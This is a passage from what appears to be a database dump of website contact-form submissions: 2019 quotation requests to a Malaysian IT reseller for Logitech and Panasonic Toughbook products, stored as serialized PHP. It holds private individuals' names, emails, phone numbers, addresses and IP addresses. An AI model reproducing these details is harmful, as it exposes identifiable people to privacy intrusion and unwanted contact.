FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"TOUGHBOOK 31, TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-19 21:15:04','183.171.185.32','1'),(65,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Mohd Safadi Saaidi\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"safadi@servicecom.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60162208404\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Servicecom Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"8, Jalan USJ 19/4A, USJ 19\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"Logitech Rally, Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:60:\"Pls quote these 2 items; 1. Rally system 2. Rally PTZ camera\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"16\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-20 11:00:21','1.9.121.172','1'),(66,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"SyameelaTaufek\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"syameela@malaysiaairports.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162641472\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Malaysia Airports Holdings Berhad\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:67:\"Airline Marketing Office, Level 3 KLIA Arrival Hall Area (Domestic)\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-20 11:25:16','221.133.45.124','1'),(67,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Syazwan Bin Che Mat\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"syazwan@integriti.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124957597\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Institut Integriti Malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:111:\"Institut Integriti Malaysia, Menara Integriti, Persiaran Tunku Syed Sirajudin, Bukit Tunku, 50480 Kuala Lumpur.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"Logitech Group, Logitech MeetUp, Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"Please send me the quotation as soon as possible.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"89\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-20 15:25:50','175.143.72.6','1'),(68,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Mohd Azmi Bin Ahmad\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"azmi@man-marine.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60192102071\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Marine\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:45:\"K13554 1st Floor Taman Desa Solehah Mak Chili\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 33\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"07\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-21 14:14:26','115.135.172.100','1'),(69,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Mohd Azmi Bin Ahmad\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"azmi@man-marine.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60192102071\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Marine\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:45:\"K13554 1st Floor Taman Desa Solehah Mak Chili\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 33\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"07\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-21 14:14:29','115.135.172.100','1'),(70,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Mohd Azmi Ahmad\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"mohdazmiahmad78@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60192102071\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Marine\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:45:\"K13554 1st floor Taman Desa Solehah Mak Chili\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"TOUGHPAD FZ-M1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"08\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-21 14:16:30','115.135.172.100','1'),(71,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"G-MiE AMNet\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"amnetcc@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193579230\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"AMNet 